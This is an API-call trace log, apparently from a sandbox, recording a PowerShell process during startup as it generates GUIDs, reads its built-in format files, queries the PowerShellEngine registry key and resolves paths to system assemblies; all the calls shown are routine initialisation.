	[0770.701] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0770.703] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0xec2210de, Data2=0x9d79, Data3=0x49d5, Data4=([0]=0x9b, [1]=0x19, [2]=0xba, [3]=0x69, [4]=0xd1, [5]=0xaf, [6]=0xd, [7]=0x33))) returned 0x0
	[0770.703] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x5b76eae, Data2=0xc61d, Data3=0x4823, Data4=([0]=0xba, [1]=0x63, [2]=0x45, [3]=0x80, [4]=0x60, [5]=0xee, [6]=0x94, [7]=0x86))) returned 0x0
	[0770.703] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0xdb86cca6, Data2=0x41b8, Data3=0x4cac, Data4=([0]=0x8b, [1]=0x18, [2]=0x8c, [3]=0x41, [4]=0x7d, [5]=0x86, [6]=0xf9, [7]=0x3d))) returned 0x0
	[0770.703] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0xd23f9759, Data2=0xcf42, Data3=0x4d57, Data4=([0]=0xb3, [1]=0xfc, [2]=0xa8, [3]=0x37, [4]=0xb5, [5]=0xfa, [6]=0x19, [7]=0xd1))) returned 0x0
	[0770.703] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x5089b389, Data2=0x5f82, Data3=0x473f, Data4=([0]=0x8d, [1]=0xe3, [2]=0x68, [3]=0xe7, [4]=0x3e, [5]=0xaa, [6]=0x3b, [7]=0xac))) returned 0x0
	[0770.704] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x54b93079, Data2=0xe4bb, Data3=0x4c4d, Data4=([0]=0x99, [1]=0xc, [2]=0x38, [3]=0xf4, [4]=0x1b, [5]=0x28, [6]=0x8, [7]=0x61))) returned 0x0
	[0770.704] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x5310880b, Data2=0x3f5c, Data3=0x4122, Data4=([0]=0x85, [1]=0xa4, [2]=0x9b, [3]=0xb5, [4]=0xe1, [5]=0x43, [6]=0xd2, [7]=0x8c))) returned 0x0
	[0770.704] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0xf0af70c9, Data2=0xffdb, Data3=0x4d4c, Data4=([0]=0xa9, [1]=0x95, [2]=0x39, [3]=0x16, [4]=0xeb, [5]=0xda, [6]=0xdf, [7]=0xe9))) returned 0x0
	[0770.704] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x5728e4b1, Data2=0x222c, Data3=0x4600, Data4=([0]=0x8e, [1]=0xbc, [2]=0xb0, [3]=0x1c, [4]=0xcf, [5]=0x86, [6]=0xa0, [7]=0x44))) returned 0x0
	[0770.704] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0xa2d833f2, Data2=0xc49c, Data3=0x41b8, Data4=([0]=0xa8, [1]=0x54, [2]=0x32, [3]=0xc4, [4]=0x77, [5]=0x9, [6]=0x8e, [7]=0xb4))) returned 0x0
	[0770.704] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0xc5af1d13, Data2=0x1dba, Data3=0x49aa, Data4=([0]=0xb8, [1]=0x7a, [2]=0x95, [3]=0xda, [4]=0x2e, [5]=0x6e, [6]=0xf8, [7]=0x5a))) returned 0x0
	[0770.705] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x5fad7c6e, Data2=0xc21, Data3=0x4842, Data4=([0]=0x89, [1]=0xb5, [2]=0xff, [3]=0x5f, [4]=0x1c, [5]=0x34, [6]=0xdb, [7]=0xf0))) returned 0x0
	[0770.705] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0xefc3ee61, Data2=0x92c9, Data3=0x4c01, Data4=([0]=0x8b, [1]=0x17, [2]=0x55, [3]=0x85, [4]=0xd3, [5]=0x3e, [6]=0xc9, [7]=0xa9))) returned 0x0
	[0770.705] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x1722dde1, Data2=0xe444, Data3=0x409a, Data4=([0]=0xb4, [1]=0x70, [2]=0x7a, [3]=0x88, [4]=0xc4, [5]=0x14, [6]=0x3, [7]=0x7f))) returned 0x0
	[0770.705] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0xb31ea6c9, Data2=0x394a, Data3=0x4e1f, Data4=([0]=0xb6, [1]=0x9, [2]=0xec, [3]=0x23, [4]=0xff, [5]=0xbd, [6]=0x19, [7]=0xc3))) returned 0x0
	[0770.705] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0xbc5fdc3a, Data2=0xf4fa, Data3=0x403b, Data4=([0]=0x8f, [1]=0x68, [2]=0x32, [3]=0x96, [4]=0xa9, [5]=0xd, [6]=0x83, [7]=0x4d))) returned 0x0
	[0771.309] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x62fd103a, Data2=0x850a, Data3=0x4e4b, Data4=([0]=0x9d, [1]=0xbf, [2]=0x26, [3]=0xb8, [4]=0xf4, [5]=0xae, [6]=0x9f, [7]=0xbf))) returned 0x0
	[0771.309] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x5aaa676, Data2=0xfb38, Data3=0x4ff3, Data4=([0]=0xaa, [1]=0x24, [2]=0xaa, [3]=0x80, [4]=0x49, [5]=0x4, [6]=0x25, [7]=0x87))) returned 0x0
	[0771.310] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0xe1e7c0e5, Data2=0x305, Data3=0x4f87, Data4=([0]=0xba, [1]=0x4e, [2]=0xb9, [3]=0xd1, [4]=0x4b, [5]=0x85, [6]=0x39, [7]=0x7e))) returned 0x0
	[0771.310] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0xac6c0ca0, Data2=0x6992, Data3=0x42da, Data4=([0]=0x8a, [1]=0xd0, [2]=0xb9, [3]=0xc0, [4]=0x5a, [5]=0x51, [6]=0x18, [7]=0xd2))) returned 0x0
	[0771.310] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x9f0f29f4, Data2=0xbf86, Data3=0x40b7, Data4=([0]=0x97, [1]=0xde, [2]=0xe2, [3]=0xa0, [4]=0x45, [5]=0xb, [6]=0x7c, [7]=0x7))) returned 0x0
	[0771.310] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x33f97765, Data2=0x5045, Data3=0x4795, Data4=([0]=0x9c, [1]=0xd3, [2]=0x62, [3]=0x37, [4]=0xbd, [5]=0xa7, [6]=0x13, [7]=0x3c))) returned 0x0
	[0771.310] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0xd6bd52ff, Data2=0xd608, Data3=0x46b3, Data4=([0]=0x90, [1]=0xc3, [2]=0xce, [3]=0x53, [4]=0x2a, [5]=0x2a, [6]=0x3f, [7]=0x2d))) returned 0x0
	[0771.311] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0xfabc7021, Data2=0x7db6, Data3=0x42a0, Data4=([0]=0xa0, [1]=0x88, [2]=0xa1, [3]=0xd1, [4]=0x74, [5]=0xec, [6]=0xd6, [7]=0xb1))) returned 0x0
	[0771.311] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x491cec6f, Data2=0x8f9, Data3=0x484f, Data4=([0]=0x8e, [1]=0x7, [2]=0x81, [3]=0x3, [4]=0x94, [5]=0xb8, [6]=0x4b, [7]=0x1d))) returned 0x0
	[0771.311] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x1e9c32a9, Data2=0x1b4f, Data3=0x4bf5, Data4=([0]=0x8e, [1]=0x49, [2]=0xc4, [3]=0xda, [4]=0x96, [5]=0x53, [6]=0xab, [7]=0x32))) returned 0x0
	[0771.311] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x7569dd4, Data2=0x37e9, Data3=0x4ca4, Data4=([0]=0xbb, [1]=0xa7, [2]=0xcf, [3]=0x7, [4]=0x61, [5]=0xf4, [6]=0xe7, [7]=0xac))) returned 0x0
	[0771.311] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x8cec0869, Data2=0x207d, Data3=0x4506, Data4=([0]=0xb0, [1]=0x92, [2]=0xa7, [3]=0xe5, [4]=0x49, [5]=0x5b, [6]=0x65, [7]=0x1c))) returned 0x0
	[0771.311] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x7948690c, Data2=0x3643, Data3=0x4658, Data4=([0]=0xa4, [1]=0x2d, [2]=0x17, [3]=0x64, [4]=0x7c, [5]=0xde, [6]=0x6f, [7]=0xf7))) returned 0x0
	[0771.312] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x5f47ac27, Data2=0xf8cd, Data3=0x4e6c, Data4=([0]=0xa2, [1]=0x22, [2]=0x90, [3]=0x83, [4]=0xe4, [5]=0xa, [6]=0xb4, [7]=0x9e))) returned 0x0
	[0771.312] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x120e86bd, Data2=0x14f0, Data3=0x44a3, Data4=([0]=0x91, [1]=0x5f, [2]=0x6b, [3]=0xcc, [4]=0xcd, [5]=0x84, [6]=0x4, [7]=0xa))) returned 0x0
	[0771.312] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0xc7dbc6f9, Data2=0x8cd8, Data3=0x48c9, Data4=([0]=0xb9, [1]=0x98, [2]=0xdf, [3]=0xf7, [4]=0x6f, [5]=0x13, [6]=0x52, [7]=0xc4))) returned 0x0
	[0771.312] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0xc9051cb8, Data2=0x59a0, Data3=0x4627, Data4=([0]=0xb6, [1]=0xff, [2]=0x64, [3]=0xe4, [4]=0xc, [5]=0xe8, [6]=0x19, [7]=0xa8))) returned 0x0
	[0771.319] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0xf97b6d48, Data2=0x9b0e, Data3=0x4a69, Data4=([0]=0x98, [1]=0x11, [2]=0xb0, [3]=0x98, [4]=0xc, [5]=0xc, [6]=0x9f, [7]=0x96))) returned 0x0
	[0771.319] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0xa2da3441, Data2=0xf63f, Data3=0x4154, Data4=([0]=0x93, [1]=0x8e, [2]=0x63, [3]=0x60, [4]=0xc1, [5]=0x4a, [6]=0xf7, [7]=0x88))) returned 0x0
	[0771.319] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x4177e23f, Data2=0x50b, Data3=0x4aba, Data4=([0]=0xbb, [1]=0xee, [2]=0xa4, [3]=0xbc, [4]=0xd9, [5]=0xa4, [6]=0x8a, [7]=0xf2))) returned 0x0
	[0771.319] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x618749a6, Data2=0x4015, Data3=0x4808, Data4=([0]=0x96, [1]=0x96, [2]=0x49, [3]=0x29, [4]=0xed, [5]=0x4c, [6]=0xd1, [7]=0xe3))) returned 0x0
	[0771.320] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0xc6756ef4, Data2=0x7113, Data3=0x4b91, Data4=([0]=0xba, [1]=0x93, [2]=0x8b, [3]=0x4e, [4]=0x6f, [5]=0x79, [6]=0x10, [7]=0xe5))) returned 0x0
	[0771.321] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x91aebb72, Data2=0xcf11, Data3=0x4650, Data4=([0]=0xaf, [1]=0xed, [2]=0x35, [3]=0xc2, [4]=0x25, [5]=0x93, [6]=0x10, [7]=0xdd))) returned 0x0
	[0771.321] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0xc38d67e2, Data2=0x52aa, Data3=0x42c6, Data4=([0]=0xb3, [1]=0x3f, [2]=0xa, [3]=0x7, [4]=0x57, [5]=0x5d, [6]=0x12, [7]=0x34))) returned 0x0
	[0771.321] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0xc7baa801, Data2=0xb2a, Data3=0x4d56, Data4=([0]=0x91, [1]=0x30, [2]=0x83, [3]=0x2, [4]=0x48, [5]=0x9d, [6]=0x3b, [7]=0x8))) returned 0x0
	[0771.322] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0xc699e7c, Data2=0x2ce6, Data3=0x4708, Data4=([0]=0xb8, [1]=0x6d, [2]=0xea, [3]=0x8c, [4]=0x9c, [5]=0x41, [6]=0xdd, [7]=0x2e))) returned 0x0
	[0771.322] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x26ead82a, Data2=0xef8e, Data3=0x46ac, Data4=([0]=0xb5, [1]=0x34, [2]=0xdc, [3]=0x2a, [4]=0x45, [5]=0xee, [6]=0xc1, [7]=0xcc))) returned 0x0
	[0771.322] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x8a376a2d, Data2=0xe078, Data3=0x4507, Data4=([0]=0xaa, [1]=0xd1, [2]=0x9a, [3]=0xed, [4]=0x4f, [5]=0xfc, [6]=0xfe, [7]=0x7f))) returned 0x0
	[0771.322] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0xcdcd2943, Data2=0x5db9, Data3=0x4c1a, Data4=([0]=0x8b, [1]=0x3a, [2]=0xa8, [3]=0x82, [4]=0x3e, [5]=0x4, [6]=0x73, [7]=0xf7))) returned 0x0
	[0771.322] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x49fd6be7, Data2=0x5a0f, Data3=0x4f1b, Data4=([0]=0xb8, [1]=0x34, [2]=0x5b, [3]=0x38, [4]=0xcd, [5]=0x2e, [6]=0xf1, [7]=0xd4))) returned 0x0
	[0771.322] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0xbd9efdd0, Data2=0xf84d, Data3=0x4659, Data4=([0]=0xbd, [1]=0x35, [2]=0x6, [3]=0x55, [4]=0xd5, [5]=0x94, [6]=0xe8, [7]=0x5a))) returned 0x0
	[0771.323] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0xbae0ebbe, Data2=0xb3f1, Data3=0x4308, Data4=([0]=0xa2, [1]=0x26, [2]=0x9a, [3]=0x71, [4]=0x3a, [5]=0xad, [6]=0xea, [7]=0x31))) returned 0x0
	[0771.323] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x310
	[0771.323] GetFileType (hFile=0x310) returned 0x1
	[0771.323] SetErrorMode (uMode=0x1) returned 0x1
	[0771.323] GetFileType (hFile=0x310) returned 0x1
	[0771.323] ReadFile (in: hFile=0x310, lpBuffer=0x31e0d10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x31e0d10*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0771.324] ReadFile (in: hFile=0x310, lpBuffer=0x31e0d10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x31e0d10*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0771.324] ReadFile (in: hFile=0x310, lpBuffer=0x31e0d10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x31e0d10*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0771.324] ReadFile (in: hFile=0x310, lpBuffer=0x31e0d10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x31e0d10*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0771.324] ReadFile (in: hFile=0x310, lpBuffer=0x31e0d10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x31e0d10*, lpNumberOfBytesRead=0x20d138*=0x8b4, lpOverlapped=0x0) returned 1
	[0771.324] ReadFile (in: hFile=0x310, lpBuffer=0x31e012c, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x31e012c*, lpNumberOfBytesRead=0x20d138*=0x0, lpOverlapped=0x0) returned 1
	[0771.324] ReadFile (in: hFile=0x310, lpBuffer=0x31e0d10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x31e0d10*, lpNumberOfBytesRead=0x20d138*=0x0, lpOverlapped=0x0) returned 1
	[0771.325] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d1c8 | out: phkResult=0x20d1c8*=0x310) returned 0x0
	[0771.325] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d14c, lpData=0x0, lpcbData=0x20d148*=0x0 | out: lpType=0x20d14c*=0x1, lpData=0x0, lpcbData=0x20d148*=0x56) returned 0x0
	[0771.325] CoTaskMemAlloc (cb=0x5a) returned 0x1b8560b0
	[0771.325] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d11c, lpData=0x1b8560b0, lpcbData=0x20d118*=0x56 | out: lpType=0x20d11c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x20d118*=0x56) returned 0x0
	[0771.325] CoTaskMemFree (pv=0x1b8560b0) 
	[0771.325] RegCloseKey (hKey=0x310) returned 0x0
	[0771.325] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20ce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0771.326] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0771.326] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0xc9218a31, Data2=0xa120, Data3=0x4eff, Data4=([0]=0xb4, [1]=0x5a, [2]=0x5b, [3]=0xa0, [4]=0x2d, [5]=0x6e, [6]=0x10, [7]=0xa0))) returned 0x0
	[0771.326] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x22c0f4df, Data2=0xa74, Data3=0x49e5, Data4=([0]=0x90, [1]=0x93, [2]=0x92, [3]=0x58, [4]=0xc0, [5]=0xa4, [6]=0xb5, [7]=0x7))) returned 0x0
	[0771.326] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x310
	[0771.326] GetFileType (hFile=0x310) returned 0x1
	[0771.327] SetErrorMode (uMode=0x1) returned 0x1
	[0771.327] GetFileType (hFile=0x310) returned 0x1
	[0771.327] ReadFile (in: hFile=0x310, lpBuffer=0x321eaf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x321eaf8*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0771.327] ReadFile (in: hFile=0x310, lpBuffer=0x321eaf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x321eaf8*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0771.327] ReadFile (in: hFile=0x310, lpBuffer=0x321eaf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x321eaf8*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0771.327] ReadFile (in: hFile=0x310, lpBuffer=0x321eaf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x321eaf8*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0771.327] ReadFile (in: hFile=0x310, lpBuffer=0x321eaf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x321eaf8*, lpNumberOfBytesRead=0x20d138*=0xe98, lpOverlapped=0x0) returned 1
	[0771.328] ReadFile (in: hFile=0x310, lpBuffer=0x321e0f8, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x321e0f8*, lpNumberOfBytesRead=0x20d138*=0x0, lpOverlapped=0x0) returned 1
	[0771.328] ReadFile (in: hFile=0x310, lpBuffer=0x321eaf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x321eaf8*, lpNumberOfBytesRead=0x20d138*=0x0, lpOverlapped=0x0) returned 1
	[0771.328] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d1c8 | out: phkResult=0x20d1c8*=0x310) returned 0x0
	[0771.328] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d14c, lpData=0x0, lpcbData=0x20d148*=0x0 | out: lpType=0x20d14c*=0x1, lpData=0x0, lpcbData=0x20d148*=0x56) returned 0x0
	[0771.328] CoTaskMemAlloc (cb=0x5a) returned 0x1b8560b0
	[0771.328] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d11c, lpData=0x1b8560b0, lpcbData=0x20d118*=0x56 | out: lpType=0x20d11c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x20d118*=0x56) returned 0x0
	[0771.328] CoTaskMemFree (pv=0x1b8560b0) 
	[0771.328] RegCloseKey (hKey=0x310) returned 0x0
	[0771.329] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20ce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0771.329] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0771.329] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x6496187c, Data2=0xd751, Data3=0x4c97, Data4=([0]=0xbb, [1]=0x5e, [2]=0x28, [3]=0xcd, [4]=0x19, [5]=0x2a, [6]=0x1e, [7]=0xff))) returned 0x0
	[0771.330] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x9c7bc0f4, Data2=0xdf00, Data3=0x47b7, Data4=([0]=0xad, [1]=0x61, [2]=0x93, [3]=0xeb, [4]=0x59, [5]=0xad, [6]=0x88, [7]=0xa5))) returned 0x0
	[0772.986] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x20d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0772.986] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x20d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0773.004] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x20d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0773.005] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x20d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0773.008] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0773.009] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0773.012] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x20d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0773.012] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x20d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
